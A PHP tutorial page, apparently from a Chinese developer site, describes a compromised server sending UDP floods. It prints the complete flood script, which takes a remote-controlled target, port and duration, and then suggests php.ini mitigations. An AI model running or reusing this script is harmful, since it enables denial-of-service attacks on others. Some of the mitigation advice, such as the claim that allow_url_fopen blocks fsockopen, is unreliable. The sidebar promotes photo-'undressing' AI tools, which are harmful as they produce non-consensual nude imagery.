Table of Contents
php ddos ​​attack solution, phpddos attack
Home Backend Development PHP Tutorial Solution to php ddos ​​attack, php ddos ​​attack_PHP tutorial

Solution to php ddos ​​attack, php ddos ​​attack_PHP tutorial

Jul 13, 2016 am 10:10 AM
ddos ddos attack php Solution

php ddos ​​attack solution, phpddos attack

The example in this article describes the solution to Ddos attack in PHP. Share it with everyone for your reference. The specific analysis is as follows:

Today, one of my machines suddenly sent a large number of data packets to the outside world, which could reach more than 1G per second. Although I used a policy to prohibit UDP packets, they could not be sent out, but it took up a lot of cup, so I finally found a way to solve it. .

Look at the source code first, the code is as follows:

Copy code The code is as follows:
set_time_limit(999999);
$host = $_GET['host'];
$port = $_GET['port'];
$exec_time = $_GET['time'];
$Sendlen = 65535;
$packets = 0;
ignore_user_abort(True);

if (StrLen($host)==0 or StrLen($port)==0 or StrLen($exec_time)==0){
If (StrLen($_GET['rat'])<>0){
echo $_GET['rat'].$_SERVER["HTTP_HOST"]."|".GetHostByName($_SERVER['SERVER_NAME'])."|".php_uname()."|".$_SERVER['SERVER_SOFTWARE' ].$_GET['rat'];
exit;
                                                             echo "Parameters can not be empty!";
exit;
}

for($i=0;$i<$Sendlen;$i++){
          $out .= "A";
}

$max_time = time()+$exec_time;

while(1){
$packets++;
If(time() > $max_time){
         break;
}
$fp = fsockopen("udp://$host", $port, $errno, $errstr, 5);
            if($fp){
                    fwrite($fp, $out);
                  fclose($fp);
}
}

echo "Send Host:$host:$port

";
echo "Send Flow: $packets * ($Sendlen/1024=" . round($Sendlen/1024, 2) . ")kb / 1024 = " . round($packets*$Sendlen/1024/1024, 2) . " mb

";
echo "Send Rate:" . round($packets/$exec_time, 2) . " packs/s;" . round($packets/$exec_time*$Sendlen/1024/1024, 2) . " mb/s";
?>

The key code is as follows:
Copy code The code is as follows:
$fp = fsockopen("udp://$ip", $rand, $errno, $ errstr, 5);
The method is very simple. Send a UDP packet to the target host and define an infinite loop, which will create greater pressure.

This pressure is on the server that executes this script, because it first consumes a lot of its own network bandwidth, CPU and other resources. If you want to use this script to put pressure on the target site, you need to execute it on multiple servers. This script, DDOS, since it uses fsockopen to request external requests, then it is not allowed to request.

Set in php.ini, the code is as follows:

Copy code The code is as follows:
allow_url_fopen = Off

If he can still send the package in this way, the code is as follows:

extension=php_sockets.dll

changed to

;extension=php_sockets.dll

Restart APACHE, IIS, and NGINX to prevent PHP DDOS from sending packages.

In addition, some netizens said that it is very simple to disable the setting of scripts to no timeout:

1. Disable the set_time_limit function

2. Enable PHP’s safe mode (safe_mode=on).

To disable the socket function, you can directly disable all socket modules or disable the fsockopen function. It is recommended that since socket is often used to send emails to retrieve passwords, it is recommended to directly enable the safe mode. However, in this case, the script will time out every 30 seconds. , I guess no "hacker" is lonely enough to click to start DDOS every 30 seconds.

Experience:This kind of problem is usually caused by website security. We should pay attention to the security of the website and the security of the server, so that it is not easy to be invaded. If you know how to use macofee friends, you can check the website. It would be better to limit it.

I hope this article will be helpful to everyone’s PHP programming design.

www.bkjia.comtruehttp: //www.bkjia.com/PHPjc/939403.htmlTechArticlephp ddos ​​attack solution, phpddos attack This article describes the php ddos ​​attack solution with examples. Share it with everyone for your reference. The specific analysis is as follows: Today one of my machines suddenly...
Statement of this Website
The content of this article is voluntarily contributed by netizens, and the copyright belongs to the original author. This site does not assume corresponding legal responsibility. If you find any content suspected of plagiarism or infringement, please contact admin@php.cn

Hot AI Tools

Undresser.AI Undress

Undresser.AI Undress

AI-powered app for creating realistic nude photos

AI Clothes Remover

AI Clothes Remover

Online AI tool for removing clothes from photos.

Undress AI Tool

Undress AI Tool

Undress images for free

Clothoff.io

Clothoff.io

AI clothes remover

AI Hentai Generator

AI Hentai Generator

Generate AI Hentai for free.

Hot Article

R.E.P.O. Energy Crystals Explained and What They Do (Yellow Crystal)
2 weeks ago By 尊渡假赌尊渡假赌尊渡假赌
Hello Kitty Island Adventure: How To Get Giant Seeds
1 months ago By 尊渡假赌尊渡假赌尊渡假赌
Two Point Museum: All Exhibits And Where To Find Them
1 months ago By 尊渡假赌尊渡假赌尊渡假赌

Hot Tools

Notepad++7.3.1

Notepad++7.3.1

Easy-to-use and free code editor

SublimeText3 Chinese version

SublimeText3 Chinese version

Chinese version, very easy to use

Zend Studio 13.0.1

Zend Studio 13.0.1

Powerful PHP integrated development environment

Dreamweaver CS6

Dreamweaver CS6

Visual web development tools

SublimeText3 Mac version

SublimeText3 Mac version

God-level code editing software (SublimeText3)

Explain late static binding in PHP (static::). Explain late static binding in PHP (static::). Apr 03, 2025 am 12:04 AM

Static binding (static::) implements late static binding (LSB) in PHP, allowing calling classes to be referenced in static contexts rather than defining classes. 1) The parsing process is performed at runtime, 2) Look up the call class in the inheritance relationship, 3) It may bring performance overhead.

What are PHP magic methods (__construct, __destruct, __call, __get, __set, etc.) and provide use cases? What are PHP magic methods (__construct, __destruct, __call, __get, __set, etc.) and provide use cases? Apr 03, 2025 am 12:03 AM

What are the magic methods of PHP? PHP's magic methods include: 1.\_\_construct, used to initialize objects; 2.\_\_destruct, used to clean up resources; 3.\_\_call, handle non-existent method calls; 4.\_\_get, implement dynamic attribute access; 5.\_\_set, implement dynamic attribute settings. These methods are automatically called in certain situations, improving code flexibility and efficiency.

Explain JSON Web Tokens (JWT) and their use case in PHP APIs. Explain JSON Web Tokens (JWT) and their use case in PHP APIs. Apr 05, 2025 am 12:04 AM

JWT is an open standard based on JSON, used to securely transmit information between parties, mainly for identity authentication and information exchange. 1. JWT consists of three parts: Header, Payload and Signature. 2. The working principle of JWT includes three steps: generating JWT, verifying JWT and parsing Payload. 3. When using JWT for authentication in PHP, JWT can be generated and verified, and user role and permission information can be included in advanced usage. 4. Common errors include signature verification failure, token expiration, and payload oversized. Debugging skills include using debugging tools and logging. 5. Performance optimization and best practices include using appropriate signature algorithms, setting validity periods reasonably,

Common errors and ways to avoid char in C language Common errors and ways to avoid char in C language Apr 03, 2025 pm 03:06 PM

Errors and avoidance methods for using char in C language: Uninitialized char variables: Initialize using constants or string literals. Out of character range: Compare whether the variable value is within the valid range (-128 to 127). Character comparison is case-insensitive: Use toupper() or tolower() to convert character case. '\0' is not added when referencing a character array with char*: use strlen() or manually add '\0' to mark the end of the array. Ignore the array size when using char arrays: explicitly specify the array size or use sizeof() to determine the length. No null pointer is not checked when using char pointer: Check whether the pointer is NULL before use. Use char pointer to point to non-character data

What is NULL useful in C language What is NULL useful in C language Apr 03, 2025 pm 12:03 PM

NULL is a special value in C language, representing a null pointer, which is used to identify that the pointer variable does not point to a valid memory address. Understanding NULL is crucial because it helps avoid program crashes and ensures code robustness. Common usages include parameter checking, memory allocation, and optional parameters for function design. When using NULL, you should be careful to avoid errors such as dangling pointers and forgetting to check NULL, and take efficient NULL checks and clear naming to optimize code performance and readability.

What should I do if I encounter garbled code printing for front-end thermal paper receipts? What should I do if I encounter garbled code printing for front-end thermal paper receipts? Apr 04, 2025 pm 02:42 PM

Frequently Asked Questions and Solutions for Front-end Thermal Paper Ticket Printing In Front-end Development, Ticket Printing is a common requirement. However, many developers are implementing...

How to manually trigger the onBlur event of a cell in Avue-crud row editing mode? How to manually trigger the onBlur event of a cell in Avue-crud row editing mode? Apr 04, 2025 pm 02:00 PM

The onBlur event that implements Avue-crud row editing in the Avue component library manually triggers the Avue-crud component. It provides convenient in-line editing functions, but sometimes we need to...

Tutorial on how to represent the greatest common divisor in C language functions Tutorial on how to represent the greatest common divisor in C language functions Apr 03, 2025 pm 11:21 PM

Methods to efficiently and elegantly find the greatest common divisor in C language: use phase division to solve by constantly dividing the remainder until the remainder is 0. Two implementation methods are provided: recursion and iteration are concise and clear, and the iterative implementation is higher and more stable. Pay attention to handling negative numbers and 0s, and consider performance optimization, but the phase division itself is efficient enough.

See all articles